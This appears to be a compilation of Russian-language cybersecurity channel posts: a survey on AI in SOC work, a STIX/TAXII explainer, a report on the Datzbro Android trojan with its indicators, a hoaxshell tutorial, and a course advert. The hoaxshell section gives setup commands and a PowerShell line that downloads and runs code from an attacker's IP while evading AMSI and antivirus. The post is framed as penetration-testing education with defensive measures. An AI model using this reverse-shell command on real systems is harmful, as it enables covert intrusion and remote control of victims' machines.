🤖 ИИ внедряется в работу SOC

📊 Исходя из недавнего исследования Prophet Security, традиционная модель работы SOC уже не выдерживает наплыва работы, накапливая большие объемы оповещения, замедляя расследования и увеличивая стоимость перегруженных команд SOC-аналитиков.

🗣 Опрос проходил среди 282 руководителей служб безопасности компаний из разных отраслей, раскрывая суровую реальность, с которой сталкиваются современные центры безопасности, которые уже не могут скрывать такие серьезные проблемы, как пропуск критических угроз.

📈 В связи с чем компании стали активно внедрять ИИ в работу своих SOC команд. Таким образом ИИ переходит от эксперимента к стратегическому приоритету.

🤖 В настоящее время 55% служб безопасности уже используют ИИ, как ассистента в рабочих процессах для поддержки сортировки оповещений и проведения расследований.

📈 Следующая волна внедрения стремительно приближается. Среди команд, ещё не использующих ИИ, 60% планируют оценить решения SOC на базе ИИ в течение года. Согласно опросу, ожидается, что в ближайшие три года 60% всех рабочих нагрузок SOC будут обрабатываться с помощью ИИ.

⌛️ В качестве метрик успешности внедрения ИИ организации планируют оценивать прогресс по сокращению среднего времени расследования (MTTI) и среднего времени реагирования (MTTR), а также по традиционным показателям закрытия оповещений.

➡️ Что такое STIX и TAXII?

❓ Данные термины в киберразведке используются часто вместе, но что это такое и зачем они нужны?

🔺 STIX (Structured Threat Information eXpression) — это стандартный язык для структурированного описания и обмена информацией о киберугрозах. Он предоставляет общую структуру для представления данных об индикаторах компрометации, тактиках, техниках и процедурах угроз, а также участников угроз. Это позволяет организациям более эффективно обмениваться и анализировать разведывательную информацию для улучшения защиты и реагирования на инциденты

🔺 TAXII (Trusted Automated eXchange of Intelligence Information) — это протокол и набор сервисов, который обеспечивает стандартизованный и автоматизированный обмен информацией, представленной в формате STIX, между организациями. TAXII использует HTTPS и RESTful API для передачи данных, обеспечивает обнаружение, управление коллекциями данных и поддерживает различные модели обмена. Это позволяет организациям надежно и эффективно обмениваться актуальной информацией об угрозах в автоматическом режиме.

👀 Получается, что STIX отвечает за структуру и формат описания угроз, а TAXII - за способ передачи информации об угрозах. Именно поэтому они используются совместно для улучшения обмена информации об угрозах. Но как это все выглядит на практике?

Пример STIX:

{
  "type": "bundle",
  "id": "bundle--12345678-1234-1234-1234-123456789abc",
  "objects": [
    {
      "type": "indicator",
      "id": "indicator--abcd1234-5678-90ef-ghij-klmnopqrstuv",
      "created": "2025-09-30T12:00:00Z",
      "modified": "2025-09-30T12:00:00Z",
      "name": "Malicious IP Address",
      "description": "Known IP address associated with malware command and control",
      "pattern": "[ipv4-addr:value = '192.0.2.1']",
      "pattern_type": "stix",
      "valid_from": "2025-09-01T00:00:00Z"
    }
  ]
}

Этот пример описывает "индикатор" — IP-адрес 192.0.2.1, который ассоциируется с вредоносной активностью. В STIX используются объекты с типами, например "indicator", а также указывается паттерн (pattern) для обозначения конкретного признака угрозы.

📱 Банковский Android-троян атакует пожилых людей!

👨‍🦳 Новый Android-троян «Datzbro» обманывает пожилых людей, используя сгенерированные искусственным интеллектом события путешествий в Facebook. Исследователи выявили ранее не выявленный банковский троян для Android под названием Datzbro , который может осуществлять атаки по захвату устройств ( DTO ) и совершать мошеннические транзакции, наживаясь на пожилых людях.

🌐 Компания ThreatFabric заявила, что обнаружила эту вредоносную активность в августе 2025 года после того, как пользователи в Австралии сообщили о мошенниках, управляющих группами в Facebook, рекламирующими «активные поездки для пожилых людей». Среди других территорий, на которые нацелились злоумышленники, — Сингапур, Малайзия, Канада, ЮАР и Великобритания.

📱 Действовали злоумышленники следующим образом: создавали тематические сообщества в Facebook, в которых генерировался контент с помощью ИИ, далее пожилые люди, которые ищут возможности для общения и путешествия, обращались к ним за услугами. После чего с ними связываются через Facebook или WhatsApp, где их просят загрузить APK-файл по вредоносной ссылке (например, «download.seniorgroupapps[.]com»), утверждая, что это позволит им зарегистрироваться на мероприятии, общаться с участниками и отслеживать запланированные мероприятия.

📵 Ниже приведен список вредоносных приложений Android, которые были обнаружены в процессе распространения Datzbro:

Senior Group (twzlibwr.rlrkvsdw.bcfwgozi)
Живые годы (orgLivelyYears.browses646)
ActiveSenior (com.forest481.security)
DanceWave (inedpnok.kfxuvnie.mggfqzhl)
作业帮 (io.mobile.Itool）
麻豆传媒 (fsxhibqhbh.hlyzqkd.aois
麻豆传媒 (mobi.audio.aassistant)
谷歌浏览器 (tvmhnrvsp.zltixkpp.mdok)
MT管理器 (varuhphk.vadneozj.tltldo)
MT管理器 (spvojpr.bkkhxobj.twfwf)
大麦 (mnamrdrefa.edldylo.zish)
MT管理器 (io.red.studio.tracker)

⚠️ На данный момент подобные атаки еще на зафиксированы на территории России, но, по возможности, лучше предостеречь своих близких!

Обход защиты с помощью hoaxshell: HTTP-канал для скрытного управления Windows

Специалисты по кибербезопасности традиционно разделяют инструменты для тестирования на проникновение на два типа: мощные, но сложные, или простые, но ограниченные. Hoaxshell — инструмент, который ломает стереотип. Скрипт использует нестандартный подход к работе с PowerShell, превращая его в эффективное средство для моделирования угроз и оценки защищённости инфраструктуры.

📌 Уникальность Hoaxshell
Традиционные методы получения обратного соединения (reverse shell) через PowerShell часто сталкиваются с проблемами: встроенные защитные механизмы Windows (AMSI), системы обнаружения вторжений (IDS) и межсетевые экраны легко распознают и блокируют стандартные шаблоны трафика.
Hoaxshell обходит эти препятствия за счет двух ключевых особенностей:
- В отличие от сырых TCP-сокетов, hoaxshell использует HTTP/S-запросы для коммуникации. Это позволяет ему маскировать свой трафик под легитимную активность веб-браузера или другого приложения, что значительно усложняет его обнаружение.
- Инструмент генерирует команды PowerShell, которые не содержат явных признаков вредоносной активности. Эти команды динамически получают инструкции от сервера, что позволяет обходить статические сигнатуры антивирусов.

⬇️Установка

git clone https://github.com/t3l3machus/hoaxshell
cd ./hoaxshell
sudo pip3 install -r requirements.txt
chmod +x hoaxshell.py

⬇️Проверка

hoaxshell -h

⚪Запуск сервера
Серверная часть hoaxshell запускается на машине тестировщика (атакующего). Самый простой способ — запустить его на всех интерфейсах, указав порт.

sudo python3 hoaxshell.py -s 8080

После запуска скрипт сгенерирует уникальную команду PowerShell, которую необходимо выполнить на целевой машине. Это будет выглядеть примерно так:

PS C:\> $s='http://ВАШ_IP:8080'; $i='UNIQUE_SESSION_ID'; $p='http://proxy-server.com:8080'; iex (New-Object Net.WebClient).DownloadString("$s/index.html")

⚪Вариации для обхода защиты
Для шифрования трафика и лучшей маскировки можно использовать встроенный сервер с SSL.

sudo python3 hoaxshell.py -s 443 -t ssl

В этом случае команда для цели будет использовать

https://

. Если целевая машина использует корпоративный прокси, в команду можно добавить соответствующие параметры.

📌 Меры защиты от инструментов типа hoaxshell
- Мониторинг сетевой активности (выявление регулярных HTTP/S-сессий между внутренними хостами и внешними IP)
- Аудит журналов PowerShell
(контроль событий выполнения внешнего кода (например, через DownloadString))
- Ограничение возможностей PowerShell (использование Constrained Language Mode для блокировки выполнения скриптов)
- Сегментация сети (блокировка несанкционированных исходящих HTTP/S-подключений с рабочих станций)

Киберпреступления оставляют цифровые следы. Научитесь их находить.

Цифровой криминалист — это тот, кто расследует атаки, восстанавливает данные и делает виртуальный мир безопаснее.

Освойте цифровую криминалистику и реагирование на инциденты в Linux-среде. Старт курса 13 октября!

⌨️ Регистрация здесь

Что вас ждёт на курсе:
🟧 Реальные кейсы, основанные на APT-отчетах
🟧 Полный цикл реагирования на инциденты с помощью opensource-инструментов
🟧 Поиск и анализ артефактов хакеров и вредоносного ПО

Кому подходит курс:
🟧 Аналитикам 1, 2, 3 линии SOC
🟧 Начинающим специалистам в DFIR и Red Team
🟧 Организациям, желающим прокачать команду по реагированию на киберинциденты и Linux-форензику

Хотите научиться расследовать кибератаки и распутывать цифровые следы?
Присоединяйтесь — узнайте всё о форензике. Начать учиться сейчас

🚀 @CodebyManagerBot